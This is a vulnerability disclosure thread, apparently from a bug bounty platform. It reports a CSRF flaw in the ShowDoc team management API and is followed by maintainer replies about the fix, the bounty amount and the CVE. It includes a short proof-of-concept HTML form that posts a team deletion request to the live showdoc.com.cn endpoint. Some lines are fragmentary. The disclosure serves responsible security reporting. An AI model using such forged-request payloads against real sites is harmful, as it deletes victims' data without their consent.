Cross-Site Request Forgery (CSRF) in star7th/showdoc
Nov 21st 2021
You set the
strict flag only for one of your cookies named
cookie_token but in Team management attacker still can delete or add teams with CSRF vulnerability as the cookie with name
PHPSESSID don't have
Proof of Concept
38046 with the
2.open poc.html and click on submit button.
3.after that the team with id
38046 or your replaced team id will be deleted.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST"> <input type="hidden" name="id" value="38046" /> <input type="submit" value="Submit request" /> </form> </body> </html>
I should fix it. You can test it
Not fixed and just like before( I logout from the system and login again)
this is a fix commit that have a good fix for strict cookies :
@amammad 👋 it looks like a bug on our side caused the disclosure bounty to be set to $155. We have reset it to the value displayed at disclosure ($64). Apologies for the confusion or inconvenience.
@amammad You can close the browser and open it again. Because the previous phpsessid was automatically maintained by the program, you need to restart the browser to invalidate it. If you log in again, the phpsessid is not regenerated.
CVE published! 🎊